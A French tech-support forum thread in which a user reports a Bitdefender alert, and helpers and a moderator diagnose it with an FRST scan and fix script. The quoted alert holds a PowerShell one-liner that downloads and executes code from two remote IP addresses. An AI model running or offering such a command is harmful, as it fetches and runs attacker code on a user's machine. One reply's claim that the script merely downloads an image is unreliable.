Sujet Précédent

Ligne de commande malveillante

Résolu
Tid77 Messages postés 5 Date d'inscription   Statut Membre Dernière intervention   -  
bazfile Messages postés 60895 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   -

Bonjour,

Je viens d'avoir une alerte bitdefender sur mon PC indiquant : "L'application C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe a reçu une ligne de commande malveillante et a été bloquée. Votre appareil est maintenant protégé. Ligne de commande :C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://185.93.89.44/Qt6WebChannel.gif')"

Puis une deuxième presque identique mais avec "DownloadString('http://213.177.179.17/bcaa9418b53f09ae355830667b334eb8')"

J'ai coupé l'accès à Internet dans le doute. Bitdefender, adwcleaner et malwarebytes ne détectent rien. Pouvez-vous me renseigner ? Merci.


Android / Chrome 143.0.0.0

A voir également:

5 réponses

Réponse 1 / 5
brucine Messages postés 23823 Date d'inscription   Statut Membre Dernière intervention   3 797
 

Bonjour,

Ce n'est pas une raison pour poser la même question à la Terre entière.

Tous les scripts ne sont pas forcément illégitimes, le logiciel de sécurité fait son job en demandant ce qu'il doit en faire sans risque supplémentaire s'ils ont été interdits et qu'il n'y a pas d'autre demande qu'il aurait été à même d'intercepter.

Dans le cas présent, on n'est même pas certain d'avoir affaire à un virus installé mais en cas de doute on peut demander une analyse FRST.

Même si le premier est innocent (il ne fait que demander le téléchargement d'une image à partir d'un site Web), ces scripts sont douteux pour faire appel à des sites dont le premier serait situé aux Pays-Bas et le deuxième au Moyen-Orient.

Mais cette situation peut survenir si on s'est connecté à un site douteux ou qu'on utilise un logiciel en installant d'autres indésirables où alors, en l'absence d'extension contrôlant les scripts sur son navigateur, cette connexion va lire un script sur ce site ou un site tiers tentant de télécharger ces contenus.

Dans cette hypothèse, il n'y aura bien sûr pas de virus si l'exécution de ces scripts a été refusée.
 
1
Réponse 2 / 5
bazfile Messages postés 60895 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   19 877
 

Pas d'infection sur le pc BitDefender a du supprimer le script powershell suspect.

Il n'y a que quelques processus obsolètes/orphelins si tu souhaites les supprimer fait ce qui suit.

Procédure à faire dans l'ordre indiqué :

1- Ouvre FRST en tant qu'administrateur pour cela clique avec le bouton droit de ta souris sur FRST et choisis exécuter en tant qu'administrateur
2 - Copie l'intégralité du script qui est dans l'encadré qui suit :

Start::
CreateRestorePoint:
CloseProcesses:
CustomCLSID: HKU\S-1-5-21-3454350499-1640127003-1992707889-1001_Classes\CLSID\{3e5dba08-7ec3-cc88-1f18-0cf79ce7ade4}\localserver32 -> "C:\Program Files\AtlasVPN\Bin\AtlasVPN.exe" -ToastActivated => Pas de fichier
AlternateDataStreams: C:\Users\Utilisateur\Downloads\adwcleaner.exe:BDU [0]
FirewallRules: [{92EDC742-A3F2-494A-B1D9-165DB9E89E57}] => (Allow) C:\Users\Utilisateur\AppData\Local\Temp\utorrent\utorrent.exe => Pas de fichier
FirewallRules: [{9A402B89-68CB-4E28-BF2A-45711BD5A5B6}] => (Allow) C:\Users\Utilisateur\AppData\Local\Temp\utorrent\utorrent.exe => Pas de fichier
FirewallRules: [TCP Query User{0FF38ACE-4139-4DC2-9000-584E864E6CE9}C:\users\utilisateur\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\utilisateur\appdata\roaming\utorrent\utorrent.exe => Pas de fichier
FirewallRules: [UDP Query User{CDC9A033-B3EC-4A50-80AB-2ED53459B8FA}C:\users\utilisateur\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\utilisateur\appdata\roaming\utorrent\utorrent.exe => Pas de fichier
FirewallRules: [{D84E4EC2-C945-4EE2-9941-5C01F64AAE1A}] => (Block) C:\users\utilisateur\appdata\roaming\utorrent\utorrent.exe => Pas de fichier
FirewallRules: [{4EBE7AB1-C8FE-4252-AECE-A4B027F06AA3}] => (Block) C:\users\utilisateur\appdata\roaming\utorrent\utorrent.exe => Pas de fichier
FirewallRules: [TCP Query User{6D5CCE46-718C-4F0D-B4B4-A4232B7BC3B2}C:\games\achp - the london case\poirot.exe] => (Allow) C:\games\achp - the london case\poirot.exe => Pas de fichier
FirewallRules: [UDP Query User{80E19A18-4566-4B34-B7E4-1326DDA9E0CF}C:\games\achp - the london case\poirot.exe] => (Allow) C:\games\achp - the london case\poirot.exe => Pas de fichier
FirewallRules: [TCP Query User{DDB44E76-CD9A-4036-8B0C-324B32C938C6}C:\games\final fantasy i-vi bundle pixel remaster\ff5\final fantasy v.exe] => (Allow) C:\games\final fantasy i-vi bundle pixel remaster\ff5\final fantasy v.exe => Pas de fichier
FirewallRules: [UDP Query User{FBB00167-29BE-44FD-8153-CBA6034C5313}C:\games\final fantasy i-vi bundle pixel remaster\ff5\final fantasy v.exe] => (Allow) C:\games\final fantasy i-vi bundle pixel remaster\ff5\final fantasy v.exe => Pas de fichier
FirewallRules: [{06BEAB79-C723-4D70-AC95-18147392AA1C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Digimon Story Cyber Sleuth Complete Edition\app_digister\Digimon Story CS.exe => Pas de fichier
FirewallRules: [{8A8F10A8-EB42-47A1-BC5F-94299C7CA26D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Digimon Story Cyber Sleuth Complete Edition\app_digister\Digimon Story CS.exe => Pas de fichier
FirewallRules: [TCP Query User{3A784F9C-78B1-44C7-8DFA-FB4C2234872D}C:\games\eiyuden chronicle - hundred heroes\eiyudenchronicle.exe] => (Allow) C:\games\eiyuden chronicle - hundred heroes\eiyudenchronicle.exe => Pas de fichier
FirewallRules: [UDP Query User{DF21E062-4E73-48E0-852E-670F3C2F45F5}C:\games\eiyuden chronicle - hundred heroes\eiyudenchronicle.exe] => (Allow) C:\games\eiyuden chronicle - hundred heroes\eiyudenchronicle.exe => Pas de fichier
FirewallRules: [{7E558D24-DEF6-4FFD-98B0-1A4F54E54D59}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ELDEN RING\Game\start_protected_game.exe => Pas de fichier
FirewallRules: [{BC1C8161-DEC2-49F6-A1E3-078B3B28B928}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ELDEN RING\Game\start_protected_game.exe => Pas de fichier
FirewallRules: [TCP Query User{45DD861F-7A98-46E7-9E9E-2B49D5C25F13}C:\users\utilisateur\music\max gentlemen sexy business 2.18\business.exe] => (Allow) C:\users\utilisateur\music\max gentlemen sexy business 2.18\business.exe => Pas de fichier
FirewallRules: [UDP Query User{5FA0B9AE-13DD-4224-9B04-0F2D517DBC82}C:\users\utilisateur\music\max gentlemen sexy business 2.18\business.exe] => (Allow) C:\users\utilisateur\music\max gentlemen sexy business 2.18\business.exe => Pas de fichier
FirewallRules: [TCP Query User{EF725DCA-8D21-48CA-B81B-784DB8956384}C:\users\utilisateur\music\summerclover v1.10\summerclover.exe] => (Allow) C:\users\utilisateur\music\summerclover v1.10\summerclover.exe => Pas de fichier
FirewallRules: [UDP Query User{C3E47462-43B4-46F5-96A3-131D0D3F5494}C:\users\utilisateur\music\summerclover v1.10\summerclover.exe] => (Allow) C:\users\utilisateur\music\summerclover v1.10\summerclover.exe => Pas de fichier
FirewallRules: [TCP Query User{4F49D1B8-4848-47F7-848C-37855A240AB5}C:\users\utilisateur\music\handyman legend v1.0.3\handyman legend.exe] => (Allow) C:\users\utilisateur\music\handyman legend v1.0.3\handyman legend.exe => Pas de fichier
FirewallRules: [UDP Query User{AAFA83D3-3FEA-4ABD-897B-42F81B5A80E0}C:\users\utilisateur\music\handyman legend v1.0.3\handyman legend.exe] => (Allow) C:\users\utilisateur\music\handyman legend v1.0.3\handyman legend.exe => Pas de fichier
FirewallRules: [TCP Query User{2F8E6EC3-C839-4DDA-9980-467B0B8B49F3}C:\games\metaphor - refantazio\metaphor.exe] => (Allow) C:\games\metaphor - refantazio\metaphor.exe => Pas de fichier
FirewallRules: [UDP Query User{77DD19D0-7503-4625-BE08-0D8A5B34E742}C:\games\metaphor - refantazio\metaphor.exe] => (Allow) C:\games\metaphor - refantazio\metaphor.exe => Pas de fichier
FirewallRules: [TCP Query User{46FA4260-5F7E-49EB-8F7C-31EB31C10CD5}C:\program files\iflydown\iflydown.exe] => (Allow) C:\program files\iflydown\iflydown.exe => Pas de fichier
FirewallRules: [UDP Query User{ED0FE2D3-C0B2-4070-BDA7-6A3B01E427D2}C:\program files\iflydown\iflydown.exe] => (Allow) C:\program files\iflydown\iflydown.exe => Pas de fichier
FirewallRules: [{885C639D-FF80-4054-A536-766D0AE17F32}] => (Allow) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe => Pas de fichier
FirewallRules: [{2C12FF7A-DD78-4B28-8742-5BC270D1D8EA}] => (Allow) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe => Pas de fichier
FirewallRules: [{65CE1216-949D-40CC-BF28-5B317E1EB8E9}] => (Allow) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EAConnect_microsoft.exe => Pas de fichier
FirewallRules: [{6B179994-0D3B-4D69-BBDF-744245AEE88A}] => (Allow) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EAConnect_microsoft.exe => Pas de fichier
FirewallRules: [{01107E73-137F-4FED-BCDC-8DFCA1B7E30B}] => (Allow) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EADesktop.exe => Pas de fichier
FirewallRules: [{4F80EF49-CCE3-4E73-8DD8-BF01C45BDF32}] => (Allow) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EADesktop.exe => Pas de fichier
FirewallRules: [{CB332872-A07E-4F29-901B-746F8BEA625D}] => (Allow) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EAGEP.exe => Pas de fichier
FirewallRules: [{4D8CA7DA-A403-4288-BA9F-7FDAC93143B0}] => (Allow) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EAGEP.exe => Pas de fichier
FirewallRules: [{CE03DFD9-4A6A-444E-B8E8-6BC8325D1D8A}] => (Allow) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EALocalHostSvc.exe => Pas de fichier
FirewallRules: [{934E3890-6CDC-491E-A5B1-1EEFA96960DD}] => (Allow) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EALocalHostSvc.exe => Pas de fichier
FirewallRules: [{7F5FCAF1-63E1-400A-B041-84922A319442}] => (Allow) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EALaunchHelper.exe => Pas de fichier
FirewallRules: [TCP Query User{291B76E9-35B5-4000-8616-00D5BCD6AB76}C:\users\utilisateur\music\villagerhapsody\village.exe] => (Allow) C:\users\utilisateur\music\villagerhapsody\village.exe => Pas de fichier
FirewallRules: [UDP Query User{830DA882-D6CF-48CF-8187-5428438EA912}C:\users\utilisateur\music\villagerhapsody\village.exe] => (Allow) C:\users\utilisateur\music\villagerhapsody\village.exe => Pas de fichier
FirewallRules: [{25B2C10B-C1EB-4831-B5F2-88C626837A0F}] => (Allow) C:\Users\Utilisateur\AppData\Roaming\uTorrent\uTorrent.exe => Pas de fichier
FirewallRules: [{64DAC2C1-EF12-4304-A329-8AC3322CD3CF}] => (Allow) C:\Users\Utilisateur\AppData\Roaming\uTorrent\uTorrent.exe => Pas de fichier
FirewallRules: [{07B45752-2141-4C4F-AF73-7A883C549E68}] => (Allow) C:\Users\Utilisateur\AppData\Roaming\uTorrent Web\utweb.exe => Pas de fichier
FirewallRules: [{CE889E59-DC61-4930-844A-F4B71895CC73}] => (Allow) C:\Users\Utilisateur\AppData\Roaming\uTorrent Web\utweb.exe => Pas de fichier
FirewallRules: [TCP Query User{9A72C226-95C9-44E0-AB52-8E88A1507990}C:\users\utilisateur\appdata\roaming\utorrent web\utweb.exe] => (Block) C:\users\utilisateur\appdata\roaming\utorrent web\utweb.exe => Pas de fichier
FirewallRules: [UDP Query User{6D822307-599F-47D9-8D0D-1DFFA4FD762D}C:\users\utilisateur\appdata\roaming\utorrent web\utweb.exe] => (Block) C:\users\utilisateur\appdata\roaming\utorrent web\utweb.exe => Pas de fichier
FirewallRules: [TCP Query User{C8E18DF9-3386-4E11-8C15-B0B8A5A09977}C:\users\utilisateur\music\man of the house v1.0.2c (extra)\man of the house.exe] => (Allow) C:\users\utilisateur\music\man of the house v1.0.2c (extra)\man of the house.exe => Pas de fichier
FirewallRules: [UDP Query User{CA37E634-FA79-47AB-9619-73C92A524366}C:\users\utilisateur\music\man of the house v1.0.2c (extra)\man of the house.exe] => (Allow) C:\users\utilisateur\music\man of the house v1.0.2c (extra)\man of the house.exe => Pas de fichier
FirewallRules: [TCP Query User{3152E6C5-1A60-45D6-BD36-A783B0EF9A39}C:\games\av director life!\avdirectorlife\binaries\win64\avdirectorlife-win64-shipping.exe] => (Allow) C:\games\av director life!\avdirectorlife\binaries\win64\avdirectorlife-win64-shipping.exe => Pas de fichier
FirewallRules: [UDP Query User{5E58811B-46DC-4C37-A3B2-F4FF9715675A}C:\games\av director life!\avdirectorlife\binaries\win64\avdirectorlife-win64-shipping.exe] => (Allow) C:\games\av director life!\avdirectorlife\binaries\win64\avdirectorlife-win64-shipping.exe => Pas de fichier
FirewallRules: [TCP Query User{9A43C1B4-1D12-4071-8C7D-DA5092A3B3F3}C:\users\utilisateur\music\empire.of.lust\empire of lust.exe] => (Allow) C:\users\utilisateur\music\empire.of.lust\empire of lust.exe => Pas de fichier
FirewallRules: [UDP Query User{D56A1CE3-675E-4E46-8795-7CAB8E9D0B46}C:\users\utilisateur\music\empire.of.lust\empire of lust.exe] => (Allow) C:\users\utilisateur\music\empire.of.lust\empire of lust.exe => Pas de fichier
ShortcutTarget: com_base_task.lnk -> C:\Users\Utilisateur\Music\Free Download Files\data\.temp\tDMT89Tz.exe (Pas de fichier)
S3 EABackgroundService; "C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe" [X]
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiSpyware] Restriction 
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiVirus] Restriction 
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction 
End::

3- Une fois le script copié clique sur Corriger, FRST prend automatiquement le script qui est dans le presse-papier.
 


Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.

Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau ensuite envoie ce rapport fixlog sur https://pjjoint.malekal.com/ ou https://www.catupload.com/.

Puis donne le lien généré par https://pjjoint.malekal.com/ ou https://www.catupload.com/dans ta réponse.
1
Tid77
 

D'accord, merci beaucoup.

Voici les liens :

https://uploadnow.io/files/6PDb6Yn

https://uploadnow.io/f/6PDb6Yn

0
bazfile Messages postés 60895 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   19 877 > Tid77
 

@Tid77 StatutMembre .

Tout est OK.

0
Tid77 > bazfile Messages postés 60895 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention  
 

Ok super, merci beaucoup. Je ferai plus attention dorénavant.

0
bazfile Messages postés 60895 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   19 877 > Tid77
 

@+ sur CCM.

1
Réponse 3 / 5
Tid77 Messages postés 5 Date d'inscription   Statut Membre Dernière intervention  
 

Merci pour les infos.

A priori le deuxième lien indique que nginx est insallé avec succès. Est-ce un problème ?
0
Didi64_549 Messages postés 2812 Date d'inscription   Statut Membre Dernière intervention  
 

Bonjour,

Vous avez installé des logiciels tiers comme adwcleaner et malwarebytes qui créaient des conflits d'ou Defender réagit.

Pas besoin de tout ça sur un P.C. .

0
brucine Messages postés 23823 Date d'inscription   Statut Membre Dernière intervention   3 797 > Didi64_549 Messages postés 2812 Date d'inscription   Statut Membre Dernière intervention  
 

Bonjour,

On ne voit pas le rapport.

Tout logiciel de sécurité doit réagir à l'exécution d'un script, plus volontiers en demandant la permission plutôt qu'en censurant aveuglément; on attend que ce soit la réaction normale de Bit Defender même en l'absence d'utilitaires tiers en effet discutables.

0
Tid77 Messages postés 5 Date d'inscription   Statut Membre Dernière intervention   > brucine Messages postés 23823 Date d'inscription   Statut Membre Dernière intervention  
 

En l'occurrence bitdefender a bloqué tout de suite.

0
Tid77 Messages postés 5 Date d'inscription   Statut Membre Dernière intervention   > Didi64_549 Messages postés 2812 Date d'inscription   Statut Membre Dernière intervention  
 

Adwcleaner et malwarebytes ont été installés après. Comme rien n'était détecté par bitdefender j'ai voulu voir si les autres avaient des résultats différents.

0
Réponse 4 / 5
Tid77
 

Je viens de faire l'analyse FRST

Par contre je ne sais pas comment transmettre les résultats ici.
0
brucine Messages postés 23823 Date d'inscription   Statut Membre Dernière intervention   3 797
 

Commencer par voir si lors de l'installation d'un autre logiciel ou pas un logiciel indésirable n'a pas été installé dans le panneau de configuration.

Vider le cache du navigateur et les dossiers temporaires Windows.

Continuer en installant une extension anti script dans son navigateur, l'éventualité qu'il n'y ait pas de malware mais seulement un script exécuté à partir d'une page Web à laquelle on s'est connecté ou d'une page tierce qu'elle a appelé n'est toujours pas exclue.

Sinon voir:

https://forums.commentcamarche.net/forum/affich-38063320-important-a-lire-avant-tout-demande-de-desinfection#p38130346

 

0
Tid77 > brucine Messages postés 23823 Date d'inscription   Statut Membre Dernière intervention  
 

Voilà le QR code pour les deux liens.

0
Tid77 Messages postés 5 Date d'inscription   Statut Membre Dernière intervention   > brucine Messages postés 23823 Date d'inscription   Statut Membre Dernière intervention  
 

Ne serait-il pas possible de désactiver powershell puisque les lignes de commande le visent ?

0
brucine Messages postés 23823 Date d'inscription   Statut Membre Dernière intervention   3 797 > Tid77 Messages postés 5 Date d'inscription   Statut Membre Dernière intervention  
 

Cela n'a pas de sens, c'est précisément ce que fait "l'antivirus" ou plus exactement la composante de défense du logiciel de sécurité en l'empêchant d'être utilisé.

Un certain nombre de scripts PowerShell, qui peuvent être utilisés par exemple par Windows, sont légitimes.

1

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
Réponse 5 / 5
Tid77
 

Voilà les liens.

https://uploadnow.io/files/ymBwyGy 

https://uploadnow.io/f/ymBwyGy 
0

Discussions similaires

Cacher une commande amazon en 2025
Matthew5 -
Adraen -

25 réponses
Ma commande est en cours de validation sur Fnac
Ali -
Ali -

2 réponses
Ligne occupée : pourquoi mon téléphone sonne occupé ?
nanou -
Tiguet -

29 réponses